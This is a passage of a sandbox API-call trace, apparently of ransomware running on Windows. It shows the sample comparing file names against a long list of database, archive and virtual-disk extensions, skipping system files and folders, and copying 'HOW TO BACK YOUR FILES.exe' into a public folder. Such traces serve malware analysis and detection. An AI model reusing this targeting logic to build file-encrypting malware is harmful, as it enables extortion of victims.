(lpString="cma") returned 3 [0039.959] lstrcmpiW (lpString1="mp3", lpString2="cma") returned 1 [0039.959] lstrlenW (lpString="cpd") returned 3 [0039.959] lstrcmpiW (lpString1="mp3", lpString2="cpd") returned 1 [0039.959] lstrlenW (lpString="dacpac") returned 6 [0039.959] lstrcmpiW (lpString1="ba.mp3", lpString2="dacpac") returned -1 [0039.959] lstrlenW (lpString="dad") returned 3 [0039.959] lstrcmpiW (lpString1="mp3", lpString2="dad") returned 1 [0039.959] lstrlenW (lpString="dadiagrams") returned 10 [0039.959] lstrcmpiW (lpString1="alimba.mp3", lpString2="dadiagrams") returned -1 [0039.959] lstrlenW (lpString="daschema") returned 8 [0039.959] lstrcmpiW (lpString1="imba.mp3", lpString2="daschema") returned 1 [0039.959] lstrlenW (lpString="db-journal") returned 10 [0039.959] lstrcmpiW (lpString1="alimba.mp3", lpString2="db-journal") returned -1 [0039.959] lstrlenW (lpString="db-shm") returned 6 [0039.959] lstrcmpiW (lpString1="ba.mp3", lpString2="db-shm") returned -1 [0039.959] lstrlenW (lpString="db-wal") returned 6 [0039.959] lstrcmpiW (lpString1="ba.mp3", lpString2="db-wal") returned -1 [0039.959] lstrlenW (lpString="dbc") returned 3 [0039.959] lstrcmpiW (lpString1="mp3", lpString2="dbc") returned 1 [0039.959] lstrlenW (lpString="dbs") returned 3 [0039.959] lstrcmpiW (lpString1="mp3", lpString2="dbs") returned 1 [0039.959] lstrlenW (lpString="dbt") returned 3 [0039.959] lstrcmpiW (lpString1="mp3", lpString2="dbt") returned 1 [0039.959] lstrlenW (lpString="dbv") returned 3 [0039.959] lstrcmpiW (lpString1="mp3", lpString2="dbv") returned 1 [0039.959] lstrlenW (lpString="dbx") returned 3 [0039.959] lstrcmpiW (lpString1="mp3", lpString2="dbx") returned 1 [0039.959] lstrlenW (lpString="dcb") returned 3 [0039.959] lstrcmpiW (lpString1="mp3", lpString2="dcb") returned 1 [0039.960] lstrcmpiW (lpString1="mp3", lpString2="dct") returned 1 [0039.960] lstrcpyW (in: lpString1=0x2e2e8a6, lpString2="Maid with the Flaxen Hair.mp3" | out: lpString1="Maid with the Flaxen Hair.mp3") returned="Maid with the Flaxen Hair.mp3" [0039.960] lstrlenW (lpString="Maid with the Flaxen Hair.mp3") returned 29 [0039.960] lstrlenW (lpString="Ares865") returned 7 [0039.960] lstrcmpiW (lpString1="air.mp3", lpString2="Ares865") returned -1 [0039.960] lstrlenW (lpString=".dll") returned 4 [0039.960] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2=".dll") returned 1 [0039.960] lstrlenW (lpString=".lnk") returned 4 [0039.960] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2=".lnk") returned 1 [0039.960] lstrlenW (lpString=".ini") returned 4 [0039.960] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2=".ini") returned 1 [0039.960] lstrlenW (lpString=".sys") returned 4 [0039.960] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2=".sys") returned 1 [0039.960] lstrlenW (lpString="Maid with the Flaxen Hair.mp3") returned 29 [0039.960] lstrcpyW (in: lpString1=0x2e2e8a6, lpString2="Sleep Away.mp3" | out: lpString1="Sleep Away.mp3") returned="Sleep Away.mp3" [0039.960] lstrlenW (lpString="Sleep Away.mp3") returned 14 [0039.960] lstrlenW (lpString="Ares865") returned 7 [0039.960] lstrcmpiW (lpString1="way.mp3", lpString2="Ares865") returned 1 [0039.960] lstrlenW (lpString=".dll") returned 4 [0039.960] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2=".dll") returned 1 [0039.960] lstrlenW (lpString=".lnk") returned 4 [0039.960] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2=".lnk") returned 1 [0039.960] lstrlenW (lpString=".ini") returned 4 [0039.960] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2=".ini") returned 1 [0039.960] lstrlenW (lpString=".sys") returned 4 [0039.960] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2=".sys") returned 1 [0039.960] lstrlenW (lpString="Sleep Away.mp3") returned 14 [0039.961] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Public\\Libraries", iMaxLength=260 | out: lpString1="C:\\Users\\Public\\Libraries") returned="C:\\Users\\Public\\Libraries" [0039.961] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd068 | out: hHeap=0x2b0000) returned 1 [0039.961] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2280 | out: hHeap=0x2b0000) returned 1 [0039.961] lstrlenW (lpString="C:\\Users\\Public\\Libraries") returned 25 [0039.961] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Libraries" | out: lpString1="C:\\Users\\Public\\Libraries") returned="C:\\Users\\Public\\Libraries" [0039.961] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0039.961] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Public\\Libraries\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\public\\libraries\\how to back your files.exe"), bFailIfExists=1) returned 1 [0040.024] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0040.024] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Libraries\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49817020, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49817020, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0040.024] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.025] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0040.025] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0040.025] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49817020, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49817020, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.025] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.025] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0040.025] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0040.025] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0040.025] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2839e1d0, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2839e1d0, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288f9359, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x58, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0040.025] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.025] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0040.025] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0040.025] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0040.025] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0040.025] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0040.025] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0040.025] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0040.025] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0040.025] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0040.025] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0040.025] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0040.025] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0040.025] lstrlenW (lpString="desktop.ini") returned 11 [0040.025] lstrlenW (lpString="C:\\Users\\Public\\Libraries\\*") returned 27 [0040.025] lstrcpyW (in: lpString1=0x2e2e894, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0040.025] lstrlenW (lpString="desktop.ini") returned 11 [0040.025] lstrlenW (lpString="Ares865") returned 7 [0040.025] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0040.025] lstrlenW (lpString=".dll") returned 4 [0040.025] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0040.025] lstrlenW (lpString=".lnk") returned 4 [0040.025] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0040.025] lstrlenW (lpString=".ini") returned 4 [0040.025] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0040.025] lstrlenW (lpString=".sys") returned 4 [0040.025] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0040.025] lstrlenW (lpString="desktop.ini") returned 11 [0040.025] lstrlenW (lpString="bak") returned 3 [0040.026] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0040.026] lstrlenW (lpString="ba_") returned 3 [0040.026] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0040.026] lstrlenW (lpString="dbb") returned 3 [0040.026] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0040.026] lstrlenW (lpString="vmdk") returned 4 [0040.026] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0040.026] lstrlenW (lpString="rar") returned 3 [0040.026] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0040.026] lstrlenW (lpString="zip") returned 3 [0040.026] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0040.026] lstrlenW (lpString="tgz") returned 3 [0040.026] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0040.026] lstrlenW (lpString="vbox") returned 4 [0040.026] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0040.026] lstrlenW (lpString="vdi") returned 3 [0040.026] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0040.026] lstrlenW (lpString="vhd") returned 3 [0040.026] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0040.026] lstrlenW (lpString="vhdx") returned 4 [0040.026] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0040.026] lstrlenW (lpString="avhd") returned 4 [0040.026] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0040.026] lstrlenW (lpString="db") returned 2 [0040.026] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0040.026] lstrlenW (lpString="db2") returned 3 [0040.026] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0040.026] lstrlenW (lpString="db3") returned 3 [0040.026] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0040.026] lstrlenW (lpString="dbf") returned 3 [0040.026] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0040.026] lstrlenW (lpString="mdf") returned 3 [0040.026] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0040.026] lstrlenW (lpString="mdb") returned 3 [0040.026] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0040.026] lstrlenW (lpString="sql") returned 3 [0040.026] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0040.026] lstrlenW (lpString="sqlite") returned 6 [0040.027] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0040.027] lstrlenW (lpString="sqlite3") returned 7 [0040.027] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0040.027] lstrlenW (lpString="sqlitedb") returned 8 [0040.027] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0040.027] lstrlenW (lpString="xml") returned 3 [0040.027] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0040.027] lstrlenW (lpString="$er") returned 3 [0040.027] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0040.027] lstrlenW (lpString="4dd") returned 3 [0040.027] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0040.027] lstrlenW (lpString="4dl") returned 3 [0040.027] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0040.027] lstrlenW (lpString="^^^") returned 3 [0040.027] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0040.027] lstrlenW (lpString="abs") returned 3 [0040.027] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0040.027] lstrlenW (lpString="abx") returned 3 [0040.027] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0040.027] lstrlenW (lpString="accdb") returned 5 [0040.027] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0040.027] lstrlenW (lpString="accdc") returned 5 [0040.027] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0040.027] lstrlenW (lpString="accde") returned 5 [0040.027] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0040.027] lstrlenW (lpString="accdr") returned 5 [0040.027] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0040.027] lstrlenW (lpString="accdt") returned 5 [0040.027] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0040.027] lstrlenW (lpString="accdw") returned 5 [0040.027] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0040.027] lstrlenW (lpString="accft") returned 5 [0040.027] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0040.027] lstrlenW (lpString="adb") returned 3 [0040.027] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0040.027] lstrlenW (lpString="adb") returned 3 [0040.027] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0040.027] lstrlenW (lpString="ade") returned 3 [0040.027] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0040.028] lstrlenW (lpString="adf") returned 3 [0040.028] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0040.028] lstrlenW (lpString="adn") returned 3 [0040.028] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0040.028] lstrlenW (lpString="adp") returned 3 [0040.028] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0040.028] lstrlenW (lpString="alf") returned 3 [0040.028] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0040.028] lstrlenW (lpString="ask") returned 3 [0040.028] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0040.028] lstrlenW (lpString="btr") returned 3 [0040.028] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0040.028] lstrlenW (lpString="cat") returned 3 [0040.028] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0040.028] lstrlenW (lpString="cdb") returned 3 [0040.028] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0040.028] lstrlenW (lpString="ckp") returned 3 [0040.028] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0040.028] lstrlenW (lpString="cma") returned 3 [0040.028] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0040.028] lstrlenW (lpString="cpd") returned 3 [0040.028] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0040.028] lstrlenW (lpString="dacpac") returned 6 [0040.028] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0040.028] lstrlenW (lpString="dad") returned 3 [0040.028] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0040.028] lstrlenW (lpString="dadiagrams") returned 10 [0040.028] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0040.028] lstrlenW (lpString="daschema") returned 8 [0040.028] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0040.028] lstrlenW (lpString="db-journal") returned 10 [0040.028] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0040.028] lstrlenW (lpString="db-shm") returned 6 [0040.028] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0040.028] lstrlenW (lpString="db-wal") returned 6 [0040.028] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0040.028] lstrlenW (lpString="dbc") returned 3 [0040.028] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0040.028] lstrlenW (lpString="dbs") returned 3 [0040.029] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0040.029] lstrlenW (lpString="dbt") returned 3 [0040.029] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0040.029] lstrlenW (lpString="dbv") returned 3 [0040.029] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0040.029] lstrlenW (lpString="dbx") returned 3 [0040.029] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0040.029] lstrlenW (lpString="dcb") returned 3 [0040.029] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0040.029] lstrlenW (lpString="dct") returned 3 [0040.029] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0040.029] lstrlenW (lpString="dcx") returned 3 [0040.029] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0040.029] lstrlenW (lpString="ddl") returned 3 [0040.029] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0040.029] lstrlenW (lpString="dlis") returned 4 [0040.029] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0040.029] lstrlenW (lpString="dp1") returned 3 [0040.029] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0040.029] lstrlenW (lpString="dqy") returned 3 [0040.029] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0040.029] lstrlenW (lpString="dsk") returned 3 [0040.029] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0040.029] lstrlenW (lpString="dsn") returned 3 [0040.029] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0040.029] lstrlenW (lpString="dtsx") returned 4 [0040.029] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0040.029] lstrlenW (lpString="dxl") returned 3 [0040.029] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0040.029] lstrlenW (lpString="eco") returned 3 [0040.029] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0040.029] lstrlenW (lpString="ecx") returned 3 [0040.029] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0040.029] lstrlenW (lpString="edb") returned 3 [0040.029] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0040.029] lstrlenW (lpString="epim") returned 4 [0040.029] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0040.029] lstrlenW (lpString="fcd") returned 3 [0040.030] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0040.030] lstrlenW (lpString="fdb") returned 3 [0040.030] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0040.030] lstrlenW (lpString="fic") returned 3 [0040.030] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0040.030] lstrlenW (lpString="flexolibrary") returned 12 [0040.030] lstrlenW (lpString="fm5") returned 3 [0040.030] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0040.030] lstrlenW (lpString="fmp") returned 3 [0040.030] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0040.030] lstrlenW (lpString="fmp12") returned 5 [0040.030] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0040.030] lstrlenW (lpString="fmpsl") returned 5 [0040.030] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0040.030] lstrlenW (lpString="fol") returned 3 [0040.030] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0040.030] lstrlenW (lpString="fp3") returned 3 [0040.030] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0040.030] lstrlenW (lpString="fp4") returned 3 [0040.030] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0040.030] lstrlenW (lpString="fp5") returned 3 [0040.030] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0040.030] lstrlenW (lpString="fp7") returned 3 [0040.030] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0040.030] lstrlenW (lpString="fpt") returned 3 [0040.030] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0040.030] lstrlenW (lpString="frm") returned 3 [0040.030] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0040.030] lstrlenW (lpString="gdb") returned 3 [0040.030] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0040.030] lstrlenW (lpString="gdb") returned 3 [0040.030] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0040.030] lstrlenW (lpString="grdb") returned 4 [0040.030] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0040.030] lstrlenW (lpString="gwi") returned 3 [0040.030] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0040.030] lstrlenW (lpString="hdb") returned 3 [0040.030] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0040.030] lstrlenW (lpString="his") returned 3 [0040.031] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0040.031] lstrlenW (lpString="ib") returned 2 [0040.031] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0040.031] lstrlenW (lpString="idb") returned 3 [0040.031] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0040.031] lstrlenW (lpString="ihx") returned 3 [0040.031] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0040.031] lstrlenW (lpString="itdb") returned 4 [0040.031] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0040.031] lstrlenW (lpString="itw") returned 3 [0040.031] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0040.031] lstrlenW (lpString="jet") returned 3 [0040.031] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0040.031] lstrlenW (lpString="jtx") returned 3 [0040.031] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0040.031] lstrlenW (lpString="kdb") returned 3 [0040.031] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0040.031] lstrlenW (lpString="kexi") returned 4 [0040.031] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0040.031] lstrlenW (lpString="kexic") returned 5 [0040.031] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0040.031] lstrlenW (lpString="kexis") returned 5 [0040.031] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0040.031] lstrlenW (lpString="lgc") returned 3 [0040.031] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0040.031] lstrlenW (lpString="lwx") returned 3 [0040.031] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0040.031] lstrlenW (lpString="maf") returned 3 [0040.031] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0040.031] lstrlenW (lpString="maq") returned 3 [0040.031] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0040.031] lstrlenW (lpString="mar") returned 3 [0040.031] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0040.031] lstrlenW (lpString="marshal") returned 7 [0040.031] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0040.031] lstrlenW (lpString="mas") returned 3 [0040.031] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0040.031] lstrlenW (lpString="mav") returned 3 [0040.031] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0040.032] lstrlenW (lpString="maw") returned 3 [0040.032] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0040.032] lstrlenW (lpString="mdbhtml") returned 7 [0040.032] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0040.032] lstrlenW (lpString="mdn") returned 3 [0040.032] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0040.032] lstrlenW (lpString="mdt") returned 3 [0040.032] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0040.032] lstrlenW (lpString="mfd") returned 3 [0040.032] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0040.032] lstrlenW (lpString="mpd") returned 3 [0040.032] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0040.032] lstrlenW (lpString="mrg") returned 3 [0040.032] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0040.032] lstrlenW (lpString="mud") returned 3 [0040.032] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0040.032] lstrlenW (lpString="mwb") returned 3 [0040.032] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0040.032] lstrlenW (lpString="myd") returned 3 [0040.032] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0040.032] lstrlenW (lpString="ndf") returned 3 [0040.032] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0040.032] lstrlenW (lpString="nnt") returned 3 [0040.032] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0040.032] lstrlenW (lpString="nrmlib") returned 6 [0040.032] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0040.032] lstrlenW (lpString="ns2") returned 3 [0040.032] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0040.032] lstrlenW (lpString="ns3") returned 3 [0040.032] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0040.032] lstrlenW (lpString="ns4") returned 3 [0040.032] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0040.032] lstrlenW (lpString="nsf") returned 3 [0040.032] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0040.032] lstrlenW (lpString="nv") returned 2 [0040.032] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0040.032] lstrlenW (lpString="nv2") returned 3 [0040.032] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0040.033] lstrlenW (lpString="nwdb") returned 4 [0040.033] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0040.033] lstrlenW (lpString="nyf") returned 3 [0040.033] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0040.033] lstrlenW (lpString="odb") returned 3 [0040.033] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0040.033] lstrlenW (lpString="odb") returned 3 [0040.033] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0040.033] lstrlenW (lpString="oqy") returned 3 [0040.033] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0040.033] lstrlenW (lpString="ora") returned 3 [0040.033] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0040.033] lstrlenW (lpString="orx") returned 3 [0040.033] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0040.033] lstrlenW (lpString="owc") returned 3 [0040.033] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0040.033] lstrlenW (lpString="p96") returned 3 [0040.033] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0040.033] lstrlenW (lpString="p97") returned 3 [0040.033] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0040.033] lstrlenW (lpString="pan") returned 3 [0040.033] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0040.033] lstrlenW (lpString="pdb") returned 3 [0040.033] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0040.033] lstrlenW (lpString="pdm") returned 3 [0040.033] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0040.033] lstrlenW (lpString="pnz") returned 3 [0040.033] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0040.033] lstrlenW (lpString="qry") returned 3 [0040.033] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0040.033] lstrlenW (lpString="qvd") returned 3 [0040.033] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0040.033] lstrlenW (lpString="rbf") returned 3 [0040.033] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0040.033] lstrlenW (lpString="rctd") returned 4 [0040.033] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0040.033] lstrlenW (lpString="rod") returned 3 [0040.033] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0040.033] lstrlenW (lpString="rodx") returned 4 [0040.034] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0040.034] lstrlenW (lpString="rpd") returned 3 [0040.034] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0040.034] lstrlenW (lpString="rsd") returned 3 [0040.034] lstrcmpiW 